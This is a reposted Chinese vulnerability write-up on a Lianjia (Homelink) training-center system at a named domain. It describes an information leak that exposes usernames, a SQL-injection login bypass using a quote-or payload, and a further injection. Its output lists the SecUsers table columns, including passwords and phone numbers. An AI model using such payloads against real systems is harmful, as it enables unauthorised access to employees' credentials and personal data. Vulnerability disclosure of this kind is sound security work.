链家某系统(从信息泄露到非授权页面SQL注入)

  首先是这个域名

  http://tc.homelink.com.cn/

  可以看到要ID才能登陆,于是就有了信息泄露。

链家某系统(从信息泄露到非授权页面SQL注入) 
链家某系统(从信息泄露到非授权页面SQL注入)

  于是我们有了用户名,但是我还差密码。

  没有关系,因为有注入所以’or”=’就进去了。

链家某系统(从信息泄露到非授权页面SQL注入) 
链家某系统(从信息泄露到非授权页面SQL注入) 
链家某系统(从信息泄露到非授权页面SQL注入) 

  漏洞证明:

  再加上访问后里面还有注入,就跑一下吧。

链家某系统(从信息泄露到非授权页面SQL注入) 
链家某系统(从信息泄露到非授权页面SQL注入)

以下是代码片段:
Database: TrainingCenter

Table: SecUsers

[25 columns]

+——————–+———-+

| Column | Type |

+——————–+———-+

| AreaUniqNo | int |

| BLAreaUniqNo | int |

| BLBranchUniqNo | int |

| BLCityUniqNo | int |

| BLDivisionUniqNo | int |

| BLTeamUniqNo | int |

| BLZoneUniqNo | int |

| BranchUniqNo | int |

| CityUniqNo | int |

| DivisionUniqNo | int |

| SecUserUniqNo | int |

| TeamUniqNo | int |

| UserDefaultProgram | nvarchar |

| UserEmpName | nvarchar |

| UserEmpNo | int |

| UserGender | nvarchar |

| UserID | nvarchar |

| UserJobTitle | nvarchar |

| UserJobType | nvarchar |

| UserMobile | nvarchar |

| UserOPType | char |

| UserPassword | nvarchar |

| UserPhone | nvarchar |

| UserRole | nvarchar |

| ZoneUniqNo | int |

+——————–+———-+

链家某系统(从信息泄露到非授权页面SQL注入)  

原文地址:https://hack.77169.com/201510/213191.shtm

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容